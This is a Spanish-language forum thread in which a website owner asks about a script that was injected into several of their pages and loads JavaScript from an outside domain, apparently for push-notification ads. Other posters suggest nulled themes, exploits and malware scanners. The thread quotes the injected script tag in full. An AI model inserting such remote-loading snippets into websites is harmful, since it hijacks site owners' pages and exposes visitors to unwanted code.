Codigo sospechoso afectando carga de paginas, ayuda por favor

• Autor Autor drak1
  • Fecha de inicio Fecha de inicio
D

drak1

Delta
Verificación en dos pasos activada
Verificado por Whatsapp
buenas pues queria preguntar si alguien sabe de que es este codigo que dejare abajo. pues de la noche a la mañana apareció en algunas de mis paginas y hace que tarden en cargar.. en algunas lo encontré en el header y fue facil quitarlo pero en otras aun que cambie de theme veo que sigue cargando y hace que la web tarde en cargar. donde podria estar oculto? sera intento de hackeo? y ademas desaparecio mi publicidad magicamente espero puedan ayudarme
<script>var pm_tag = 'xas';var pm_pid = "23751-b1930d72";</script><script src="//wps.wfcs.lol/js/pub.min.js" async></script>

muchas gracias amigo el problema es que yo no uso esa publicidad y no encuentro el codigo solo en algunas de mis web lo encontre en el header
si usas un theme pirata o nulled, pues te toca cambiarlo si o si para que no te siga sucediendo, y ya cuando cambies el theme no te deberia salir mas publicidad

Hola buenos días, una consulta, has instalado algún plugin o tema nulled. Lo que puedes hacer para identificar en donde el problema, es usar el plugin de wordfence o el de sucury, estos dos plugin te permiten revisar tu web e identificarlo, con esto ya puedes realizar los cambios en tu página web.

Última edición:
Hola buenos días, una consulta, has instalado algún plugin o tema nulled. Lo que puedes hacer para identificar en donde el problema, es usar el plugin de wordfence o el de sucury, estos dos plugin te permiten revisar tu web e identificarlo, con esto ya puedes realizar los cambios en tu página web.
gracias amigo por el interés pues uso un theme normalito de la pagina https://themezee.com/ el caso esta en que como dije en algunas de mis paginas aparece el codigo lo borro y listo pero hoy mismo veo que ya de nuevo aparece que carga esa publicidad pero no encuentre el codigo por ninguna parte tu sabes en que archivos puedo buscar ademas de los clásicos index header foother que pueda ser donde este por eso lo carga agredesco tu ayuda

probablemente tengas malware si vuelve a aparecer después del borrado o quizá el código está puesto por defecto. Es cosa que analices la carpeta del theme únicamente

buenas pues queria preguntar si alguien sabe de que es este codigo que dejare abajo. pues de la noche a la mañana apareció en algunas de mis paginas y hace que tarden en cargar.. en algunas lo encontré en el header y fue facil quitarlo pero en otras aun que cambie de theme veo que sigue cargando y hace que la web tarde en cargar. donde podria estar oculto? sera intento de hackeo? y ademas desaparecio mi publicidad magicamente espero puedan ayudarme
te inyectaron codigo, te hackearon por Exploit o usaste algun plugin o theme nulled, tambien puede que el creador del tema le ponga esos scripts a su theme apropósito

La verdad que es ingenioso introducir código que monetice con notificaciones push solamente, no se nota apenas en la web, a los webmasters ni les suele salir la ventana por haberla rechazado muchas veces y sacas algo de cada web.

Como te han dicho, te han infectado, lo que sea, hace la función de introducir ese código, con lo que tienes que borrar la función para que no vuelva a introducirlo, no sirve solo con borrar eso.

Atrás